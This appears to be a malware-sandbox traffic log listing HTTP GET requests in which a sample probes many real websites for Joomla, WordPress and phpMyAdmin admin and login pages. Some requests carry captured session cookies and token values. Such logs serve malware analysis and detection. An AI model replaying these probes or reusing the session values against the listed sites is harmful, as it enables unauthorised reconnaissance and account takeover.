Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/administrator HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tcetmumbai.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: capforge.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /saml/index.php?page=%2Fphpmyadmin%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=unid3p469s9hj2a6pka8sch23rUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://edgewater.group/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: jamiesonmullin.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://jamiesonmullin.com/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: bunasta.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: wonka.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ce-logic.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://ce-logic.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /concord/phpMyAdmin/ HTTP/1.1Host: kidsrkids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: capforge.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.linkan-group.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.linkan-group.com/administrator
Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://webstamp.ca/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.maxiv.lu.seAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /en/administrator/index.php HTTP/1.1Host: www.dstaq.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.dstaq.com/en/administrator
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.2brospw.com/administrator
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: unaj.edu.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://unaj.edu.pe/administrator/
Source: global trafficHTTP traffic detected: GET /domain_profile.cfm?d=robinsonland.com HTTP/1.1Host: www.hugedomains.comAccept: */*Accept-Encoding: deflate, gzipCookie: site_version_phase=108; site_version=HDv3User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.hugedomains.com/domain_profile.cfm?d=robinsonland.com
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: saudi-jamac.comAccept: */*Accept-Encoding: deflate, gzipCookie: dps_site_id=us-east-1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: OF=rbm97dnas60169fmufv15tpfb5User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: webstamp.caAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.grg17geblergasse.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: engel-firm.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://engel-firm.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: beachrecruitment.comAccept: */*Accept-Encoding: deflate, gzipCookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=3dbfg2bnrmlhvmjhpi48421sg2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://tiswheels.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: capforge.comAccept: */*Accept-Encoding: deflate, gzipCookie: pbid=1edc227536cb7fc30f88097431cc67116634c85ffdbc8581853118f953068a74User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://capforge.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.avient.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: coralparkchristian.orgAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=25spuedk1v8jkqk9dcaj8tnufuUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=k11oabf2270bqa8id9iv53haooUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://talentius.com/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=CCSTuNw27vjAGhe0LambVrEDd4CnmWBK1UKexrI2tUk-1700978372739-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tradeavenida.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: hightideinc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.harasduberry.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.harasduberry.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: eco-landeck.atAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.perrisesd.orgAccept: */*Accept-Encoding: deflate, gzipCookie: SWSessionID=ba42e268-c765-4904-80e3-ade29c961f0f; AccountID=Xogon24LhVEF1Gfd40nUZQ==; APIKey=1bbe4818-f2c5-416c-a84a-2ce99b631f94; CSAN=zXOKKR3GedasH9m5g4E4RQ==; PSDB=lL7iN951F63+qccmbSPISkYpSYcXNAdZfwA6IkfZ1mg=; PSN=TYQOVZnyPCoiWL2kw/FH8w==User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.perrisesd.org/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: belongfbg.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: himontessori.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://himontessori.com/wp-login.php
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rech.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gatewaytoearlylearning.comAccept: */*Accept-Encoding: deflate, gzipCookie: PublishedSiteSession=eyJpdiI6IitSbkFTNmJDdjloOWhzTnFzTm9qZ1E9PSIsInZhbHVlIjoiaEFSQ29UbVZRQ29lczgrVDZYMGR4NDkyd1MwNkx2TG9kOUpoVEhxdUIzRSsydE50aGYxekF4RkRvNk1kaUh2c1hyYkVFalByeDJuOE9QckNwV21lMjVLTnY4cEV2TUtOZitzb1c0UVVLVWVCYTZ3NllZWmdiTXFYSlZyR0FhcHEiLCJtYWMiOiJhMjg5ZTNiNmRlMTdjMDllNTQzNTZjMmI5YTNhZmNhYzI4ZjExM2E0NTQ0ZDhiNGM4NjQ1Nzc0NDQ2MGViN2UyIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6IjNpSDA4TTd2dzFidW15T3J0Q1EwNEE9PSIsInZhbHVlIjoiTTRWK1RrOHAzeFRlbWNaSm15TU1yWmdObVBKYW9rQk43THM3ZzZRekFpQlNvM00yNkRvSTNBeEFDVlBkT3FvYUp1aTZrNEdub2Q4aE9NbHp2VmVGS2lRcUs5dC8rdE5USEtJMFZYdGNGRXJDU2tweUluS01ST3FTSnQ1ZWkxN3MiLCJtYWMiOiI1YTdkOGYwZDQ0ZjkwN2VkZjUxMThkMzI2MWE2YWJhOGNlMjUwYjdiZTE3OWYzMjQ5YjdhNDFhMTMyMmFhNjlhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6InN0bXgycFppajByVzJ5VVFma0l6Q1E9PSIsInZhbHVlIjoiMHpVODVyYnBYREhlaXpTQS9mOTZkUUVYdjFHcWh4bWhnMytScHBadC9hbkF3RktMbXVBNmwwYVN4ZWVtQldJS2pwWm9rU0U4d2lYbGd4ZEFLNEVlOW5Bc0E3WFRCUmMwMjBjUFB1RDJ0NnZqR1ZlWWQ0ckxUWStRaWZqR1c4bmkiLCJtYWMiOiI2OTU4OWFkZGVkMzU2N2I5ZGJlMGVhMWJmZmUxYzA0NjdlYjBlNDM1M2M2ZTcyNDczYzkwNTNkOTc1NzdhMGU3IiwidGFnIjoiIn0%3DUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://www.gatewaytoearlylearning.com/administrator
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipCookie: pbid=172ff377aa4b3bde11e2a50383ed15a74ccd93833e8072198de1d3f5028def60User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mydirectlender.com/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: daisyokogyo.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.rechagricola.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.avient.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.avient.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: capforge.comAccept: */*Accept-Encoding: deflate, gzipCookie: pbid=1edc227536cb7fc30f88097431cc67116634c85ffdbc8581853118f953068a74User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://capforge.com/administrator/
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getquipu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://getquipu.com/
Source: global trafficHTTP traffic detected: GET /login/?page=%2Fadministrator%2F HTTP/1.1Host: my.calvary.qld.edu.auAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.integraledu.hrAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: tiswheels.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://tiswheels.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://lumaruniformes.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.knu.ac.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: samson.peAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /phpmyadmin HTTP/1.1Host: www.2brospw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.grantstech.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: www.ceuandalucia.esAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://www.ceuandalucia.es/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: talentius.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=k11oabf2270bqa8id9iv53haooUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://talentius.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gruporegiosafety.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gruporegiosafety.com/administrator/
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: micro-design.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://micro-design.com/administrator/
Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: student.debritto.sch.idAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: esoft.academyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://esoft.academy/administrator
Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: mydirectlender.comAccept: */*Accept-Encoding: deflate, gzipCookie: pbid=172ff377aa4b3bde11e2a50383ed15a74ccd93833e8072198de1d3f5028def60User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://mydirectlender.com/administrator/
Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: edgewater.groupAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://edgewater.group/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Ftradeavenida.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: tradeavenida.comAccept: */*Accept-Encoding: deflate, gzipCookie: _cfuvid=CCSTuNw27vjAGhe0LambVrEDd4CnmWBK1UKexrI2tUk-1700978372739-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tradeavenida.com/wp-login.php
Source: global trafficHTTP traffic detected: GET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1Host: lumaruniformes.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://lumaruniformes.com/wp-login.php
